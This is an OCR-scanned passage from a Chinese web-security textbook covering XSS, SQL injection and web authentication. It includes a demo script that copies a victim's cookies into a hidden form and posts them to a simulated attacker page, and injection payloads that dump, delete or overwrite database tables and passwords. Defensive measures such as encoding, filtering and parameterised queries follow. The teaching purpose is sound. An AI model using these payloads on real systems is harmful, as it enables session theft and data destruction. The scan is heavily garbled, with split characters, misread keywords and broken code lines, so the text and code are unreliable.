用 户 如 果 单 击 了 “ 领 奖 ” 链 接 ,attackPage. jsp 上 显示 如 图 8-48 所 示 。 


这 是 模拟 的 攻击 网 站 
邮政 从 用 广 外 各 刘 的 coskis 仆 为。 


account=guokehua; password=guol 
PSTONED D000LoT R2001 LOSEAG A GOCGLTE 


图 8-48 


Cookie 中 的 所 有 值 都 被 攻击 者 知道 了 ! 特别 是 sessionId 的 泄露 ,说 明 攻 击 者 还 
具有 了 访问 session 的 可 能 ! 

此 时 ,客户 浏览 器 的 地 址 栏 上 URL 变 为 (读者 运行 时 ,具体 内 容 可 能 不 一 样 ,但 是 
基本 效果 相同 ): 


http://localhost/attackPage. asp?cookies = account = guokehua; % 20password = guokehua; 
% 20JSESSIONID = 135766E8D33B380E426126474E28D9A9; % 20ASPSESSIONIDQQCADQDT = KFELIGF 
CPPGPHLFEDCKIPKDF 


从 这 个 含有 恶意 脚本 的 URL 中 ,比较 容易 发 现 受到 了 攻击 ,因为 URL 后 面 的 查 
询 字符 串 一 眼 就 能 看 出 来 。 聪 明 的 攻击 者 还 可 以 将 脚本 用 隐藏 表单 隐藏 起 来 。 将 
mailList. jsp 的 代码 改 为 : 


mailList. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
< 第 
//session 检查 ,代码 略 
竺 > 
<! 一 以 下 是 攻击 者 发 送 的 一 个 邮件 -一 > 
这 里 有 一 封 新 邮件 ,您 中 奖 了 ,请 您 填写 您 的 姓名 并 且 提交 : <BR> 


< script type = "text/javascript"> 
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“| 到 


function send() 

{ 

Var cookie = document. cookie; 
document. form1l. cookies. value = cookie; 


图 内 | document. form1. submit( ); 
: } 
Note </script> 
| < form name = "forml" action = "http://localhost/attackPage.asp" method = "post"> 


输入 姓名 :< input name = ""> 

< input type = "hidden" name = "cookies"> 

< input type = "button" value = "提交 姓名 "onClick = "send()"> 
</form> 


该 处 将 脚本 用 隐藏 表单 隐藏 起 来 。 输 入 姓名 的 文本 框 只 是 一 个 伪装 。 效 果 如 
图 8-49 所 示 。 


这 里 有 一 封 新 邮件 ， 和 您 中 奖 了 ， 请 您 填写 您 的 姓名 并 且 提 交 ， 
输入 姓名 [本 十 
图 8-49 
attackPage. asp 不 变 。 不 管 你 输入 什么 姓名 ,到 达 attackPage. asp 都 会 显示 如 


图 8-50 所 示 。 
也 可 以 达到 攻击 目的 。 而 此 时 ,浏览 器 地 址 栏 中 显示 如 图 8-51 所 示 。 


这 是 模拟 的 攻击 网 站 
刚才 从 用 户 处 得 到 的 Cookie 值 为 ， 
account=Eulehua; password guokeline; TERRY 
JSESSIONTD=E35C0481E25813165AEA65A180C517B9 LE 
图 8-50 图 8-51 
用 户 不 知 不 觉 受 到 了 攻击 。 


六 提示 。 实际 攻击 的 过 程 中 ,Cookie 的 值 可 以 被 攻击 者 保存 到 数据 库 或 者 通过 其 
他 手段 得 知 ,也 就 是 说 ,Cookie 的 值 不 可 能 直接 在 攻击 页 面 上 显示 ,否则 很 容易 被 用 户 
发 现 , 这 里 只 是 模拟 。 


从 以 上 例子 可 以 看 出 ,XSS 可 以 诱 使 Web 站 点 执行 本 来 不 属于 它 的 代码 ,而 这 些 
行 代码 由 攻击 者 提供 、 为 用 户 浏 览 嚣 加载 ,攻击 者 利用 这 些 代 码 执行 来 获取 信息 。XSS 
涉及 到 三 方 , 即 攻击 者 、 客 户 端 与 客户 端 访问 的 网 站 。XSS 的 攻击 目标 是 盗 取 客户 端 
的 敏感 信息 。 从 本 质 上 讲 ,XSS 漏洞 终究 原因 是 由 于 网 站 的 Web 应 用 对 用 户 提交 请 求 
参数 未 做 充分 的 检查 过 滤 。 


8.4.2 ， 跨 站 脚本 攻击 的 危害 


XSS 攻击 的 主要 危害 包括 : 

。 盗 取 用 户 的 各 类 敏感 信息 ,如 账号 密码 等 ; 
。 读 取 、 段 改 . 添 加 删除 企业 敏感 数据 ; 

"。 读 取 企业 重要 的 具有 商业 价值 的 资料 ; 
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。 控制 受害 者 机 器 向 其 他 网 站 发 起 攻击 ,等 等 。 
一 些 比 较 著 名 的 网 站 ,如 eBay, 也 曾 遭 受过 XSS 攻击 ,有 兴趣 的 读者 可 以 参考 相关 
资料 。 


8.4.3 防范 方法 


如 何 防范 XSS 攻击 呢 ? 主要 从 网 站 开发 者 角度 和 用 户 角 度 来 阐述 。 

1. 从 网 站 开发 者 角度 

根据 来 自 OWASP( 开 放 应 用 安全 计划 组 织 ) 的 建议 ,对 XSS 最 佳 的 防护 主要 体现 ， 

在 以 下 两 个 方面 : 

(1) 对 于 任意 的 输入 数据 应 该 进行 验证 ,以 有 效 检测 攻击 ; 也 就 是 说 , 某 个 数据 被 
接受 之 前 ,必须 使 用 一 定 的 验证 机 制 来 验证 所 有 输入 数据 ,如 长 度 、 格 式 、 类 型 .语法 等 ; 
常见 的 方法 ,比如 黑 名 单 验 证 ,就 是 将 一 些 常 见 的 字符 ,如 (如 二 二 或 类 似 script 的 关 
键 字 ) 进 行 过 滤 , 效 果 比 较 好 ; 不 过 ,该 方式 也 有 局 限 性 ,很 容易 被 XSS 变种 攻击 绕 过 
验证 机 制 。 | 

(2) 对 于 任意 的 输出 数据 ,要 进行 适当 的 编码 ,防止 任何 已 成 功 注 入 的 脚本 在 浏览 
器 端 运行 ; 数据 输出 前 ,确保 用 户 提 交 的 数据 已 被 正确 进行 编码 ; 可 在 代码 中 明确 指 
定 输出 的 编码 方式 (如 ISO-8859-1) ,而 不 是 让 攻击 者 发 送 一 个 由 他 自己 编码 的 脚本 给 
用 户 。 

以 下 具体 阐述 几 种 实现 方法 : 

XSS 攻击 的 一 个 来 源 在 于 ,用 户 登 录 时 ,可 以 让 那些 特殊 的 字符 也 输入 进去 。 
此 可 在 表单 提交 的 过 程 中 ,利用 一 定 手段 来 进行 限制 。 例 如 ,可 以 限制 输入 的 字符 数 ， 
来 阻止 那些 较 长 的 script 的 输入 。 另 外 ,还 可 以 用 JavaScript 来 对 字符 进行 过 滤 ,将 一 


些 如 上 外 二 >、 [人 & 十 一"、(、) 的 字符 过 滤 掉 。 如 下 函数 ,可 以 将 二 和 二 
进行 简单 过 滤 : 
filterl. jsp 


<% @ page language = "java" import = "java.util. *" pageEncoding = "gb2312" %> 
< script type = "text/javascript"> 
function filter( strTemp) 
{ 
strTemp = strTemp. replace(/<|>/g,""); 
return strTemp; 
} 
function send() 
{ 


document. queryForm. book. value = filter(document. queryForm. book. value); 
document. queryForm. submit( ); 

} 

</script> 

欢迎 查询 书本 

< form name = "queryForm" action = "filterl1. jsp" method = "post"> 
请 您 输入 书本 的 信息 : <BR> 


< input name = "book" type = "text" size = "50"> 
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< input type = "button" value = "查询 " onClick = "send()"> 
</form> 


String book = request. getParameter("book"); 


ee 
| { 


out. println(book); 


} 
先 > 


运行 时 ,输入 一 段 脚本 ,如 图 8-52 所 示 。 
提交 后 的 结果 如 图 8-53 所 示 。 


欢迎 查询 书本 


请 您 输入 书本 的 信息 : . 
Fseript alert (CJava" ) /script> 查询 | 提交 的 书本 ， scriptalert ("Java”)/script 


图 8-52 图 8-53 


3 提示。 此 处 用 到 了 正则 表达 式 : replace(/ 一 | 二 /g,""), 其 意义 是 : 将 字符 串 中 
所 有 的 “< ”和 "二 ”替换 为 空 字符 。 


不 过 ,以 上 代码 是 用 JavaScript 来 进行 过 滤 , 由 于 该 过 滤 代码 运行 在 客户 端 , 可 能 
被 攻击 者 绕 过 ,于 是 也 可 以 将 过 滤 的 代码 写 在 服务 器 端 ; 


filter2. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
欢迎 查询 书本 
< form name = "queryForm" action= "filter2. jsp" method= "post"> 
请 您 输入 书本 的 信息 : < BR> 
< input name = "book" type = "text" size= "50"> 
< input type = "submit" value = "查询 "> 
</form> 
<HR> 
提交 的 书本 : 
<% 
String book = request. getParameter("book"); 
if(book! = null) 
{ 
book = book. replaceAll("<|>",""); 
out. println(book); 


%> 


输入 同样 的 内 容 ,效果 一 样 ! 此 处 也 用 到 了 正则 表达 式 。 


提示 ”此 处 即使 用 到 正则 表达 式 将 字符 串 中 所 有 的 二 和 二 替换 为 空 字符 ,只 是 
一 个 简单 的 测试 。 实 际 操作 过 程 中 需要 替换 的 字符 很 多 ,有 兴趣 的 读者 可 以 参考 正则 


第 8 章 Web 编 程 安全 


$7 143 
表达 式 的 相关 知识 。 : 


当然 ,在 JAVAEE 系列 技术 里 面 ,过 滤 字 符 的 事情 也 可 以 由 过 滤器 来 做 。 
另 一 方面 ,还 可 以 使 用 HTML 和 URL 编码 来 避免 问题 。 虽 然 用 上 面 的 方法 进行 | 
过 滤 , 可 以 进行 防御 ,但 是 并 不 是 万 能 的 。 还 可 以 对 动态 生成 的 页 面 进行 HTML 和 全 站 
URL 编码 。 例 如 可 以 通过 VBScript 进行 编码 过 滤 : | note | 
Note 


filter3. asp 


<% @ Language = "VBScript" %> 
欢迎 查询 书本 
< form name = "queryForm" action= "filter3.asp" method= "post"> 
请 您 输入 书本 的 信息 : < BR> 
< input name = "book" type = "text" size= "50"> 
< input type = "submit" value = "查询 "> 
</form> 
<HR> 
提交 的 书本 : 
<% 
book = Request("book") 
book = Server. HTMLEncode(book) 
%> 
< 第 = book 委 > 


运行 后 的 输入 如 图 8-54 所 示 。 
提交 后 的 结果 如 图 8-55 所 示 。 
欢迎 查询 书本 


请 您 输入 书本 的 信息 ， 
[ssriptyalert CJava cscripty 查询 | 提交 的 书本 ， 《<script>alert ("Java”)</script> 


图 8-54 图 8-55 


并 没有 显示 消息 框 ,打开 客户 端 源 代码 ,显示 如 图 8-56 所 示 。 
交 的 书本 ， 
&lLt;script&gt;ialert(&quotiJauag&quot;)&lt;/script&gt3 


图 8-56 


很 明显 ,这 种 情况 下 ,浏览 器 就 不 会 将 代码 作为 脚本 来 执行 了 。 

一 般 情况 下 ,对 所 有 动态 页 面 的 输入 和 输出 都 应 进行 编码 ,从 严格 的 角度 上 讲 , 数 
据 库 数据 的 存 取 也 应 该 进行 编码 ,这样 可 以 在 较 大 程度 上 避免 跨 站 脚本 攻击 。 

2. 从 网 站 用 户 角度 

从 网 站 用 户 角 度 ,主要 要 做 到 : 

”打开 一 些 E-mail 或 附件 、 浏 览 论 坛 帖子 时 ,做 操作 时 一 定 要 特别 间 慎 ,否则 有 
可 能 导致 恶意 脚本 执行 。 不 过 ,也 可 以 在 浏览 器 设置 中 关闭 JavaScript, 如 图 8-57 所 
示 , 如 果 是 下 的 话 ,可 以 单 击 * 工 具 ”-~*Internet 选项 *-~* 安 全 ”~“* 自 定义 级 别 " 进 行 
设置 。 
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重 置 自 定义 设置 
ED [EEC 


my | 
图 8-57 


。 增强 安全 意识 ,只 信任 值得 信任 的 站 点 或 内 容 , 不 要 信任 别 的 网 站 发 到 自己 信 
任 的 网 站 中 的 内 容 。 
。 使 用 浏览 器 中 的 一 些 配置 ,等 等 。 


8.5 SQL 注 人 


8.5.1 SQL 注入 的 原理 


SQL 注入 在 英文 中 称 为 SQL Injection, 是 黑客 对 Web 数据 库 进行 攻击 的 常用 手 


段 之 一 。 在 这 种 攻击 方式 中 ,恶意 代码 被 插入 到 查询 字符 串 中 ,然后 将 该 字符 串 传递 到 


数据 库 服务 器 进行 执行 ,根据 数据 库 返 回 的 结果 ,获得 某 些 数据 并 发 起 进一步 攻击 ,其 
至 获取 管理 员 账 号 密码 .窃取 或 者 算 改 系统 数据 。 

为 了 让 读者 了 解 SQL 注入 ,这 里 举 一 个 简单 的 例子 。 

假定 数据 库 中 有 一 个 表格 ,参见 表 8-3。 


表 8-3 USERS 


ACCOUNT( 主 键 ) PASSWORD UNAME 


通过 登录 页 面 ,可 输入 用 户 的 账号 、 密 码 , 进 行 登录 ,查询 数据 库 , 为 了 将 问题 简化 ， 


。 仅仅 将 其 SQL 程序 打印 出 来 供 大 家 分 析 。 


login. jsp 


<% @ page language = "java" import = "java.util. * "pageEncoding = "gb2312" %> 
欢迎 登录 
< form action = "loginResult. jsp”method = "post"> 
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请 您 输入 账号 : 

< input name = "account" type = "text"> 

< BR> 

请 您 输入 密码 : 

< input name = "password" type = "password"> 

< input type = "submit" value= "登录 "> 
</form> 


运行 后 的 效果 如 图 8-58 所 示 。 
欢迎 登录 


请 您 输入 账号 ， 
请 您 输入 密码 ， Ed| 


图 8-58 


在 文本 框 内 输入 查询 信息 ,提交 ,能 够 到 达 loginResult. jsp 显示 登录 结果 。 
loginResult. jsp 代码 如 下 : 


loginResult. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
< 区 
// 获 取 账号 密码 
String account = request. getParameter("account" ) ; 
String password = request.getParameter("password"); 
if(account! = null) 
{ 
// 验 证 账号 密码 
String sql = "SELECT * FROM USERS WHERE ACCOUNT="" 
+ account 
+ "'AND PASSWORD = "" 
+ password 
和 
out.println(" 数 据 库 执行 语句 : <BR>" + sql); 
} 
第 > 


运行 login. jsp, 输 入 正常 数据 (如 guokehua.guokehua) 如 图 8-59 所 示 。 
欢迎 登录 


请 您 输入 账号 ， akekmm 
请 您 输入 密码 ， [seoees 了 葵 列 | 


图 8-59 
提交 ,显示 的 结果 如 图 8-60 所 示 。 


数据 库 执 行 语句 : 
SELECT * FROM USERS WHERE ACCOUNT=’ guokehua’ AND PASSNORD=’ guokehua’ 


图 8-60 
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146 号 说 
熟悉 SQL 的 读者 可 以 看 到 ,该 结果 没有 任何 问题 ,数据 库 将 对 该 输入 进行 验证 ,看 
”能 否 返 回 结 果 , 如 果 有 ,表示 登录 成 功 ,否则 表示 登录 失败 。 

但 是 该 程序 有 漏洞 。 比 如 ,客户 输入 账号 为 aa' OR 1 二 1 --, 密 码 随便 输入 ,如 aa 


( 见 图 8-61)。 


请 您 输 和 账号， REI 
请 您 输入 密码 ， | 型 到 


8-61 
查询 显示 的 结果 如 图 8-62 所 示 。 


数据 库 执行 语句 : 
SELECT * FRON USERS WHERE ACCOUNT= aa OR 1=1 — AND PASSWORD= aa 


图 8-62 


该 程序 中 ,SQL 语句 为 ; 


SELECT * FROM USERS WHERE ACCOUNT = 'aa'OR 1=1 —— 'AND PASSWORD= 'aa’ 


其 中 ,-- 表 示 注 释 ,因此 ,真正 运行 的 SQL 语句 是 : 


SELECT * FROM USERS WHERE ACCOUNT= 'aa'OR 1=1 


此 处 ,1 二 1 永 真 ,所 以 该 语句 将 返回 USERS 表 中 的 所 有 记录 。 网 站 受到 了 SQL 
注入 的 攻击 。 

另 一 种 方法 是 使 用 通配符 进行 注入 。 比 如 ,有 一 个 页 面 ,可 以 对 学 生 的 姓名 
(STUNAME) 从 STUDENTS 表 中 进行 模糊 查询 : 同样 ,为 了 将 问题 简化 ,仅仅 将 其 
SQL 打印 出 来 供 大 家 分 析 。 


query. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
欢迎 查询 
< form action = "queryResult. jsp" method = "post"> 
请 您 输入 学 生 姓名 的 模糊 资料 : 
< input name = "stuname" type= "text"> 
< input type = "submit" value = "查询 "> 
</form> 


运行 后 的 效果 如 图 8-63 所 示 。 
欢迎 查询 
请 您 输入 学 生 姓名 的 模糊 资料 。 Escksma ”车 河 | 
图 8-63 
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在 文本 框 内 输入 查询 信息 , 提交 ,能 够 到 达 queryResult. jsp 显示 登录 结果 。 
queryResult. jsp 代码 如 下 : 


queryResult. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
<% 

// 获 取 姓 名 

String stuname = request.getParameter("stuname"); 

if(stuname! = null&&! stuname. equals("")) 

{ 


String sql = "SELECT * FROM STUDENTS WHERE STUNAME LIKE '%" 


+ stuname 
Cd, et: 
out. println(" 数 据 库 执行 语句 : <BR>" + sql); 
} 
else 
{ 
out. println(" 输 入 不 正确 !"); 
} 


%> 


运行 query. jsp, 输 入 正常 数据 (如 guokehua) ,提交 ,效果 如 图 8-64 所 示 。 


数据 库 执行 语句 : 
SELECT * FRON STUDENTS WHERE STUNAME LIKE *%guokehua%’ 


图 8-64 
同样 ,该 结果 没有 任何 问题 ,数据库 将 进行 模糊 查询 并 且 返 回 结果 。 如 果 什 么 都 不 
输入 ,提交 ,效果 如 图 8-65 所 示 。 
输入 不 正确 ! 
图 8-65 
说 明 该 程序 不 允许 无 条 件 的 模糊 查询 。 
但 是 该 程序 也 有 漏洞 。 比 如 ,客户 输入 : %'--( 见 图 8-66) 。 
欢迎 查询 
请 您 输入 学 生 姓名 的 模糊 资料 ， = 其 可 
图 8-66 
查询 显示 的 结果 如 图 8-67 所 示 。 


数据 库 执 行 语句 : 
SELECT * FROM STUDENTS WHERE STUNAME LIKE ’%%"—% 


图 8-67 


该 程序 中 ,-- 表 示 注 释 , 因 此 ,真正 运行 的 SQL 语句 是 : 


SELECT * FROM STUDENTS WHERE STUNAME LIKE '% %' 
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该 语句 中 ,也 会 将 STUDENTS 中 所 有 的 内 容 显 示 出 来 。 相 当 于 程序 又 允许 了 无 


条 件 的 模糊 查询 。 
| 更 有 其 者 ,可 以 在 文本 框 内 输入 :“%';DELETE FROM STUDENTS --”: 
优 直 查询 显示 的 结果 如 图 8-68 所 示 。 
数据 库 执行 语句 ， 
SELECT * FROM STUDENTS WHERE STUNANE LIFE ’%%’ ;DELETE FROM STUDENTS —% 


图 8-68 
这 样 ,就 可 以 删除 表 STUDENTS 中 所 有 的 内 容 。 


3 提示 。 该 攻击 中 ,数据 库 中 表 名 STUDENTS 可 以 通过 猜测 的 方法 得 到 ,如 果 猜 
测 不 准确 , 那 就 没 办 法 攻击 了 。 


还 有 一 种 方法 是 直接 通过 DELETE 语句 进行 注入 ,如 有 下 面 语句 : 


= "DELETE FROM BOOKS WHERE BOOKNAME = "" 
+ bookName 
卡 


mm, 
了 


String sql 


其 中 ,bookName 为 输入 的 变量 。 
如 果 bookName 以 正常 数据 输入 ,如 输入 Java, 语 句 为 : 


DELETE FROM BOOKS WHERE BOOKNAME = 'Java' 


正常 ,但 是 如 果 给 bookName 的 值 为 Java' OR 1 二 1 --, 语 句 变 为 : 


DELETE FROM BOOKS WHERE BOOKNAME = ' Java'OR 1=1 ——"' 


实际 执行 的 语句 为 : 


DELETE FROM BOOKS WHERE BOOKNAME = ' Java'OR 1 = 1 


可 以 将 表 中 所 有 内 容 删除 。 
不 仅仅 SELECT 语句 会 被 注入 ,UPDATE 语句 也 会 被 注入 ,如 有 下 面 表格 : 


CREATE TABLE CUSTOMER ( 
ACCOUNT VARCHAR(25), 
PASSWORD VARCHAR( 25), 
CNAME VARCHAR(25), 
MONEY INT 

} 


有 一 条 语句 ,为 : 


= "UPDATE CUSTOMER SET CNAME ='" 
+ cname 
+ "WHERE ACCOUNT = '" 


String sql 


第 8 章 Web 编 程 安全 


村 


+ account 
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其 中 Cname 和 account 为 输入 的 变量 。 
如 果 cname 输入 和 account 以 正常 数据 输入 ,如 输入 guokehua、0001, 语 句 为 : 


UPDATE CUSTOMER SET CNAME = 'guokehua' WHERE ACCOUNT = '0001"' 


正常 ,但 是 如 果 给 cname 的 值 为 “guokehua', PASSWORD='111'--”,account 随便 输 
入 ,如 “111”, 语 句 变 为 : 


UPDATE CUSTOMER SET 
CNAME = 'guokehua', PASSWORD= '111' —— 'WHERE ACCOUNT = '111 7 


就 将 所 有 记录 的 CNAME 改 为 guokehua, 密 码 改 为 111。 
同样 是 上 面 那 张 表 ,如 有 INSERT 语句 : 


String sql = "INSERT INTO CUSTOMER VALUES('™" 


+ account +"', '" 
mm 


+ password +"', 
+cname +"', 0)" 


如 果 account、password 和 cname 以 正常 数据 输入 ,如 输入 0001、akdj、guokehua, 语 
句 为 : 


INSERT INTO CUSTOMER 
VALUES( '0001', ‘akdj', 'guokehua', 0) 


正常 ,但 是 如 果 给 cname 的 值 为 “guokehua'，1000) --”, 其 他 值 和 前 面 一 样 ,语句 
变 为 : 


INSERT INTO CUSTOMER 
VALUES( '0001'，'akdj'，' guokehua'，1000) —— ',0) 


很 明显 ,注册 一 个 账号 ,默认 的 MONEY 字段 变 成 了 1000。 
8.5.2 SQL 注入 攻击 的 危害 


SQL 注入 攻击 的 主要 危害 包括 : 

。 非法 读 取 , 算 改 、 添 加 、 删 除数 据 库 中 的 数据 ; 

。 盗 取 用 户 的 各 类 敏感 信息 ,获取 利益 ; 

。 通过 修改 数据 库 来 修改 网 页 上 的 内 容 ; 

。 私自 添加 或 删除 账号 ; 

。 注入 木马 ,等 等 。 

由 于 SQL 注入 攻击 一 般 利用 的 是 SQL 语法 ,这 使 所 有 基于 SQL 语言 标准 的 数据 
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库 软 件 , 如 SQL Server、Oracle、.MySQL、DB2 等 都 有 可 能 受到 攻击 ,并 且 攻 击 的 发 生 和 
Web 编程 语言 本 身 也 无 关 , 如 ASP、JSP、PHP, 在 理论 上 都 无 法 完全 幸免 。 

SQL 注入 攻击 的 危险 性 是 比较 大 的 。 很 多 其 他 攻击 ,如 DoS 等 ,可 能 通过 防火 墙 
等 手段 进行 阻拦 ,但 对 于 SQL 注入 攻击 ,由 于 注入 访问 是 通过 正常 用 户 端 进行 的 ,所 
以 普通 防火 墙 对 此 不 会 发 出 警示 ,一 般 只 能 通过 程序 来 控制 ,而 SQL 攻击 一 般 可 以 
直接 访问 数据 库 进 而 甚至 能 够 获得 数据 库 所 在 的 服务 器 的 访问 权 , 因 此 ,危害 相当 


| 严重 。 
”8.5.3 防范 方法 


以 上 问题 的 解决 方法 有 很 多 种 ,比较 常见 的 有 : 

(1) 将 输入 中 的 单 引号 变 成 双 引 号 。 这 种 方法 经 常用 于 解决 数据 库 输入 问题 , 同 
时 也 是 一 种 对 于 数据 库 安 全 问题 的 补救 措施 。 

例如 代码 ; 


String sql = "SELECT #* FROM T CUSTOMER WHERE NAME='" + name + "'"; 


当 用 户 输入 *Guokehua' OR 1 二 1 --” 时 ,首先 利用 程序 将 里 面 的 '( 单 引号 ) 换 成 " 


，《〈 双 引号 ) ,于 是 ,输入 就 变 成 了 “Guokehua" OR 1 二 1 --”,SQL 代码 变 成 ， 


。 程 的 方法 为 ， 


String sql = "SELECT * FROM T_ CUSTOMER WHERE NAME = 'Guokehua" OR1=1 一 一 


很 显然 ,该 代码 不 符合 SQL 语法 。 
如 果 是 正常 输入 呢 ? 正常 情况 下 ,用 户 输 入 Guokehua, 程 序 将 其 中 的 ' 换 成 ", 当 
然 ,这 里 面 没有 单 引 号 ,结果 仍 是 Guokehua,SQL 为 : 


String sql = "SELECT * FROM T_CUSTOMER WHERE NAME = 'Guokehua'"; 


这 是 正常 的 SQL 语句 。 

不 过 ,有 时 候 ,攻击 者 可 以 将 单 引 号 隐藏 掉 。 比 如 ,用 char(0x27) 表 示 单 引号 。 所 
以 ,该 方法 并 不 是 解决 所 有 问题 的 方法 。 

(2) 使 用 存储 过 程 。 

比如 上 面 的 例子 ,可 以 将 查询 功能 写 在 存储 过 程 prcGetCustomer 内 ,调用 存储 过 


String sql = "exec prcGetCustomer'"” +name + ""; 


当 攻 击 者 输入 *Guokehua' or 1 二 1 --” 时 ,SQL 命令 变 为 : 


exec prcGetCustomer 'Guokehua' or 1 =1 -一 


显然 无 法 通过 存储 过 程 的 编译 。 
注意 , 千 万 不 要 将 存储 过 程 定义 为 用 户 输入 的 SQL 语句 。 如 : 
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CREATE PROCEDURE prcTest (@ input varchar(256) 
RS 
exec( @ input) 


全 
从 安全 角度 讲 , 这 是 一 个 最 危险 的 错误 。 | 


Not 
提示 “实际 上 ,用 存储 过 程 也 不 能 完全 防范 本 节 出 现 的 问题 ,有 兴趣 的 读者 可 以 
设计 另 一 个 攻击 方法 。 安 全 本 身 就 是 在 攻防 间 进 行 的 博弈 ,这 也 没有 什么 好 奇怪 的 。 


(3) 认真 对 表单 输入 进行 校 验 , 从 查询 变量 中 滤 去 尽 可 能 多 的 可 疑 字 符 。 
可 以 利用 一 些 手段 ,测试 输入 字符 串 变量 的 内 容 , 定 义 一 个 格式 为 只 接受 的 格式 ， 
只 有 此 种 格式 下 的 数据 才能 被 接受 ,拒绝 其 他 输入 的 内 容 , 如 二 进 制 数据 、 转 义 序列 和 
注释 字符 等 。 另 外 ,还 可 以 对 用 户 输入 的 字符 串 变量 进行 类 型 .长 度 、 格 式 和 范围 验证 
并 过 滤 , 也 有 助 于 防治 SQL 注入 攻击 。 
(4) 在 程序 中 ,组 织 SQL 语句 时 ,应 该 尽量 将 用 户 输入 的 字符 串 以 参数 的 形式 进 | 
行 包 装 ,而 不 是 直接 其 入 SQL 语言 。 | 
由 于 很 多 SQL 注入 都 是 把 用 户 输入 和 原始 的 SQL 语言 嵌 套 组 成 查询 语句 来 完成 
攻击 ,而 参数 不 能 被 嵌 套 进入 SQL 查询 语言 ,因此 ,该 种 措施 可 以 在 某 种 程度 上 防止 
SQL 注入 。 不 过 ,在 不 同 的 语言 和 产品 里 面 ,做 法 稍 有 不 同 , 如 : 
。 如 果 使 用 Java 系列 ,可 以 使 用 PreparedStatement 代替 Statement。 
。 SQL Server 数据 库 中 可 以 使 用 存储 过 程 ,结合 Parameters 集合 ; Parameters 
集合 提供 了 长 度 验 证 和 类 型 检查 的 功能 ,Parameters 集合 内 的 内 容 将 被 视 为 字 
符 值 而 不 是 可 执行 代码 。 | 
。 .NET 中 ,SQL 语句 可 以 用 参数 来 包装 ,等 等 。 
(5) 严格 区 分 数据 库 访 问 权限 。 
在 权限 设计 中 ,对 于 应 用 软件 的 使 用 者 ,一 定 要 严格 限制 权限 ,没有 必要 给 他 们 数 
据 库 对 象 的 建立 、 删 除 等 权限 。 这 样 ,即使 在 收 到 SQL 注入 攻击 时 ,有 一 些 对 数据 库 危 
害 较 大 的 工作 ,如 DROP TABLE 语句 ,也 不 会 被 执行 ,可 以 最 大 限度 地 减少 注入 式 攻 | 
击 对 数据 库 带 来 的 危害 。 | 
(6) 多 层 架 构 下 的 防治 策略 。 
在 多 层 环境 下 ,用 户 输入 数据 的 校 验 与 数据 库 的 查询 被 分 离 成 多 个 层次 。 此 时 ,应 ， 
该 采用 以 下 方式 来 进行 验证 : 
。 用 户 输入 的 所 有 数据 ,都 需要 进行 验证 ,通过 验证 才能 进入 下 一 层 ; 此 过 程 与 
数据 库 分 离 。 
。 没有 通过 验证 的 数据 ,应 该 被 数据 库 拒绝 ,并 向 上 一 层 报 告 错 误 信 息 。 
(7) 对 于 数据 库 敏 感 的 .重要 的 数据 ,不 要 以 明文 显示 ,要 进行 加 密 。 关 于 加 密 的 
方法 ,读者 可 以 参考 后 面 的 章节 。 
(8) 对 数据 库 查询 中 的 出 错 信息 进行 屏蔽 ,尽量 减少 攻击 者 根据 数据 库 的 查询 出 
错 信息 来 猜测 数据 库 特 征 的 可 能 。 
(9) 由 于 SQL 注入 有 时 伴随 着 猜测 ,因此 ,如 果 发 现 一 个 IP 不 断 进行 登录 或 者 短 ， 
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时 间 内 不 断 进 行 查询 ,可 以 自动 拒绝 他 的 登录 ; 也 可 以 建立 攻击 者 IP 地 址 备案 机 制 ， 
对 曾经 的 攻击 者 IP 进行 备案 ,发 现 此 IP, 直 接 拒绝 。 

(10) 可 以 使 用 专业 的 漏洞 扫描 工具 来 寻找 可 能 被 攻击 的 漏洞 。 


8.6 避免 Web 认证 攻击 


8.6.1 Web 认证 攻击 概述 


在 Web 应 用 程序 的 安全 中 ,认证 是 一 个 重要 的 角色 。 对 于 一 些 受 保护 的 资源 , 必 
须 在 身份 认证 的 基础 上 进行 的 。 认 证 实际 上 属于 权限 控制 的 一 种 ,在 后 面 的 章节 中 将 
阐述 权限 控制 方面 的 一 些 内 容 , 和 传统 的 认证 方式 类 似 , Web 上 流行 的 认证 类 型 主要 
有 以 下 几 种 ,可 以 归纳 为 以 下 3 类 : 

(1) 用 户 名 /密码 。 因 为 简单 ,该 种 认证 方法 实际 上 是 当今 Web 上 最 流行 的 认证 
形式 。 一 般 情况 下 ,可 以 提供 表单 让 用 户 输入 用 户 名 /密码 。 

(2) 其 他 认证 方法 。 用 户 名 /密码 方法 也 有 一 些 脆 弱 性 ,于 是 发 明了 一 些 更 强健 的 


认证 方法 ,如 基于 令 牌 和 基于 证 书 的 认证 ,许多 Web 站 点 都 开始 为 客户 提供 。 


(3) 认证 服务 。 许 多 大 公司 提供 了 专门 的 认证 服务 ,如 微软 的 Passport, 实 现 了 一 
个 私有 信息 的 管理 和 认证 协议 ; 而 一 些 Web 站 点 把 其 上 用 户 的 认证 外 包 给 了 这 些 认 
证 服务 公司 。 

Web 认证 攻击 ,主要 过 程 是 利用 传统 Web 认证 机 制 的 漏洞 ,以 各 种 攻击 形式 获取 
合法 用 户 的 身份 信息 (如 用 户 名 /密码 ), 从 而 访问 某 些 资源 、. 盗 取 用 户 信息 或 者 控制 用 
户 程序 ; 另外 还 有 一 种 形式 ,就 是 利用 漏洞 来 绕 过 Web 认证 ,对 合法 用 户 的 信息 进行 


。 修改 ,或 者 进行 恶意 的 数据 传输 。 
8.6.2 ”Web 认证 攻击 防范 


Web 认证 攻击 的 方法 有 很 多 ,用 户 可 以 根据 实际 情况 来 采用 不 同 的 方法 加 以 应 
对 。 常 见 Web 认证 攻击 方法 有 : 

。 用 户 名 枚 举 ; 

。 密码 猜测 ; 

。 密码 穷 听 和 重 放 攻击 ,等 等 。 

实际 上 ,Web 认证 攻击 在 很 多 情况 下 可 以 通过 SQL 注入 .窃听 等 方式 来 实行 ,对 
于 不 同 的 Web 站 点 ,无 法 说 明 哪 一 种 方法 最 好 ,因此 ,此 处 提出 几 个 安全 准则 : 

(1) 密码 在 数据 库 中 不 要 以 明文 存储 ,可 以 进行 加 密 , 如 用 MD5 算法 进行 加 密 等 ， 
可 以 无 法 让 攻击 者 直接 得 知 密码 ; 

